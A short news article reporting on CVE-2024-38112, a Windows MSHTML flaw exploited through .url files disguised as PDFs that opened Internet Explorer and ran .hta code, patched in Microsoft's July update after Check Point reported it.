Hackers have been targeting Windows 10 and 11 users with malware for over a year, but a fix has finally arrived in the latest Windows update released on July 9th.
This vulnerability, exploited by malicious code since at least January 2023, was reported to Microsoft by researchers. It was fixed on Tuesday as part of Microsoft’s monthly patch release, tracked as CVE-2024-38112. The flaw, residing in the MSHTML engine of Windows, had a severity rating of 7.0 out of 10.
Security firm Check Point discovered the attack code, which used “novel tricks” to lure Windows users into executing remote code. One method involved a file named Books_A0UJKO.pdf.url, which appeared as a PDF in Windows but was actually a .url file designed to open an application via a link.
Internet Explorer Continues to Haunt Windows...
When viewed in Windows, these files looked like PDFs, but they opened a link that called msedge.exe (Edge browser). This link included attributes like mhtml: and !x-usc:, a trick long used by threat actors to open applications such as MS Word. Instead of opening in Edge, the link would open in Internet Explorer (IE), which is less secure and outdated.
Internet Explorer, Microsoft's infamously insecure browser has been discontinued for years, and even more previously unknown vulnerabilities are still occasionally discovered. The point being - once a hacker has Internet Explorer open, and the ability to tell it to open a URL, they can choose from a wide variety of methods to install software, execute code, or destroy data.
IE would prompt the user with a dialog box to open the file, and if the user clicked “open,” a second dialog box appeared, vaguely warning about opening content on the Windows device. Clicking “allow” would cause IE to load a file ending in .hta, running embedded code.
Haifei Li, the Check Point researcher who discovered the vulnerability, summarized the attack methods: the first technique used the “mhtml” trick to call IE instead of the more secure Chrome/Edge. The second technique tricked users into thinking they were opening a PDF while actually executing a dangerous .hta application. The goal was to make victims believe they were opening a PDF using these two tricks.
Check Point’s report includes cryptographic hashes for six malicious .url files used in the campaign, which Windows users can use to check if they’ve been targeted.
____
Author: Stephen Hannan
New York Newsroom
